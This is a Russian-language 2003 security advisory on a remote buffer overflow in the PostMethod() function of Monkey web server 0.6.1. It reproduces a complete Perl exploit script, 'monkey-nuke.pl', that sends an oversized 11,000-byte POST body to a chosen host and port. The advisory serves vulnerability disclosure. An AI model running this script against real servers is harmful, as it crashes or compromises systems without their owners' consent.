Security Lab

Удаленное переполнение буфера в Monkey web server

Дата публикации:24.04.2003
Всего просмотров:1141
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в Monkey web server. Удаленный пользователь может выполнить произвольный код на целевом сервере.

Удаленный пользователь может сконструировать специально обработанную Web форму и представить ее через POST метод, чтобы вызвать переполнение буфера. Согласно сообщению, переполнение обнаружено в функции PostMethod(), в которой данные, представленные пользователем, копируются в переменную 'buffer', равную 10240 символам. Эксплоит:

#!/usr/bin/perl
# monkey-nuke.pl
# Monkey HTTPd Remote Buffer Overflow
# Discovery/Exploit by Matthew Murphy
use IO::Socket;
print STDOUT "What host to connect to \[\]\: ";
$host = trim(chomp($line = <STDIN>));
print STDOUT "What port to connect to \[80\]\: ";
$port = trim(chomp($line = <STDIN>));
$addr = "$host\:$port";
print STDOUT "What script to submit to \[\/cgi-bin\/test\.pl\]\: ";
$script = trim(chomp($line = <STDIN>));
$buffer = "A"x11000;
$exploit = "POST /$script HTTP/1.0\r\n";
$exploit.= "Content-Type: application/x-www-form-urlencoded\r\n";
$exploit.= "Content-Length: 11000\r\n\r\n";
$exploit.= "$buffer\r\n\r\n";
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$addr);
print $f $exploit;
sleep 5;
undef $f;
Уязвимость обнаружена в Monkey Web Server 0.6.1
Ссылки: Monkey HTTPd Remote Buffer Overflow